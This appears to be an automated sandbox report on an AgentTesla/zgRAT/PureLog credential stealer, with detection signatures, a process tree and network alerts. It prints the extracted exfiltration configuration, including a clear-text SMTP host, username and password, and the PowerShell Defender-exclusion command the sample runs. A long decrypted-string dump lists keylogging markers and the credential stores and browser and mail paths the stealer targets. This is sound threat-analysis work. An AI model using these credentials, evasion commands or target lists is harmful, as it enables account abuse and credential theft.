Edit tour

Windows Analysis Report
PO23100076.exe

Overview

General Information

Sample name:	PO23100076.exe
Analysis ID:	1586625
MD5:	abef12c0ec6c52759f2cd9cc5402e593
SHA1:	5f8d0e0b219578e9bf15ebb85b36de1d3d951e6f
SHA256:	5b2d21f50ea195e247b45b8330c18acfd0f71e146fe40489ee8301c7045daf04
Tags:	exeuser-TeamDreier
Infos:

Detection

AgentTesla, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO23100076.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)

powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4944 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

PO23100076.exe (PID: 4644 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)

PO23100076.exe (PID: 3876 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)

PO23100076.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: PO23100076.exe PID: 5392	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO23100076.exe PID: 6936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO23100076.exe PID: 6936	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO23100076.exe.35f88d8.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
8.2.PO23100076.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO23100076.exe.67b0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO23100076.exe.37f7348.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO23100076.exe.67b0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO23100076.exe.37f7348.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO23100076.exe.35f88d8.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO23100076.exe.35f88d8.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.PO23100076.exe.35f88d8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO23100076.exe.35f88d8.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x3281f:$s1: file:/// 0x3277b:$s2: {11111-22222-10009-11112} 0x327af:$s3: {11111-22222-50001-00000} 0x3025c:$s4: get_Module 0x24ac0:$s5: Reverse 0x223530:$s5: Reverse 0x24c350:$s5: Reverse 0x26130:$s6: BlockCopy 0x224ba0:$s6: BlockCopy 0x24d9c0:$s6: BlockCopy 0x29d0bf:$s6: BlockCopy 0x24c66:$s7: ReadByte 0x2236d6:$s7: ReadByte 0x24c4f6:$s7: ReadByte 0x29cf47:$s7: ReadByte 0x32831:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100076.exe", ParentImage: C:\Users\user\Desktop\PO23100076.exe, ParentProcessId: 5392, ParentProcessName: PO23100076.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", ProcessId: 6800, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PO23100076.exe, Initiated: true, ProcessId: 6936, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100076.exe", ParentImage: C:\Users\user\Desktop\PO23100076.exe, ParentProcessId: 5392, ParentProcessName: PO23100076.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", ProcessId: 6800, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T12:40:55.696232+0100	2030171	1	A Network Trojan was detected	192.168.2.7	49702	199.79.62.115	587	TCP

ETPRO MALWARE Win32/Agent Tesla SMTP Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T12:40:55.696232+0100	2839723	1	Malware Command and Control Activity Detected	192.168.2.7	49702	199.79.62.115	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO23100076.exe

Avira: detected

Found malware configuration

Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}

Multi AV Scanner detection for submitted file

Source: PO23100076.exe	ReversingLabs: Detection: 44%
Source: PO23100076.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO23100076.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: /log.tmp
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>[
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ]<br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Time:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IP Address:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <hr>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: New
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IP Address:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: mail.mbarieservicesltd.com
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: saless@mbarieservicesltd.com
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: *o9H+18Q4%;M
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: iinfo@mbarieservicesltd.com
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: false
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: appdata
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: KTvkzEc
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: KTvkzEc.exe
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: KTvkzEc
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Type
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <hr>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <b>[
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ]</b> (
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: )<br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {BACK}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {ALT+F4}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {TAB}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {ESC}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {Win}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {DEL}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {END}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {HOME}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {Insert}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {NumLock}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {PageDown}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {PageUp}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {ENTER}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F1}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F2}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F3}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F4}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F5}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F6}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F7}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F8}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F9}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F10}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F11}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {F12}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: control
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {CTRL}
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: &
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: >
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: "
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <hr>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: logins
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IE/Edge
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Web Credentials
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SchemaId
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pResourceElement
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pPackageSid
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IE/Edge
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UC Browser
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Login Data
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: journal
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: wow_logins
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <array>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <dict>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <string>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </string>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <string>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </string>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <data>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </data>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: credential
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: QQ Browser
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Profile
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: entries
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: category
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: str3
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: str2
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: blob0
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: password_value
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IncrediMail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PopPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PopPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SmtpServer
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: EmailAddress
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Eudora
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: current
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Settings
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Settings
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: profiles.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: profiles.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \browsedata.db
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: autofill
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ClawsMail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \clawsrc
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \clawsrc
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passkey0
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \accountrc
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: smtp_server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: address
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: account
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Flock Browser
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: signons3.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: DynDns
